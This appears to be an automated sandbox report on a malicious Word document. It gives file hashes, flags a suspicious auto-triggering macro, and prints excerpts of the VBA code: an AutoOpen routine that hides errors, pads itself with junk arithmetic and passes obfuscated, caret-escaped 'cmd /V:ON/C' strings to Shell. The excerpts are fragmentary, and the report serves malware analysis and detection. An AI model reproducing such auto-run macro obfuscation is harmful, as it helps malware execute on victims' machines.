General

  • Target

    7bf9796a469fd9dc98b86fa95a206d28

  • Size

    79KB

  • MD5

    7bf9796a469fd9dc98b86fa95a206d28

  • SHA1

    9d099a838b4b9283aabf080f4c61ff744fb26ed3

  • SHA256

    1bc25579b4eca5466f6360a84d87508629512af3c1a8bba14d0a6d67933cf1f9

  • SHA512

    ad1d331edf77b66d9c5f1e55223ecbcd967aa74d0a9578cd34d8e51661a5c3e6b71eede43a45869873e3066f6f1ed786f9a460c0d84914afc68afafe34ba3a3d

  • SSDEEP

    1536:am15g1jS2Xwr+5U6Hsg6aZAO/f4Sm6eh:QlNu+5yg6aZAW4d6

Malware Config

Signatures

  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

Files

  • 7bf9796a469fd9dc98b86fa95a206d28
    .doc windows office2003

    AIIfUddBvsC

    1
    Attribute VB_Name = "AIIfUddBvsC"
    2
    Attribute VB_Base = "1Normal.ThisDocument"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = True
    8
    Attribute VB_Customizable = True
    9

    mTDiVPJjjQLbi

    1
    Attribute VB_Name = "mTDiVPJjjQLbi"
    2
    Function BilUK()
    3
    4
    On _
    5
    Error _
    6
    Resume _
    7
    Next
    8
    Hour QhZtCM / tLnNz
    9
    jiWFtrnizXl = "md /V:^" + "ON/C" + Chr(2 + 5 + 3 + 2 + 22) + "^" + "s^e^t " + "b^S" + "^P===" + "^A^" + "A^g^AAI" + "AACAg" + "AA^" + "I^A^AC" + "A^g^A^"
    10
    Hour BKjIN / ClrlsQ * 92585 * rGnAz

    aPPnsUziqWni

    1
    Attribute VB_Name = "aPPnsUziqWni"
    2
    Sub AutoOpen()
    3
    4
    On _
    5
    Error _
    6
    Resume _
    7
    Next
    8
    Hour hSOmj * dtMmfB
    9
    Hour 93201 / WaoLC
    10
    Shell ChrW(9 + 12 + 3 + 3 + 40) + jthWXDrGqUGD + RHcNjtmYcw + BilUK + SfKPDNq + nlpnwJ + WTuZLuPIG + XUfvzkLYO + uXiihrLihsCRFp + pjfsrzJjipd, 818128045 - 818128045

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.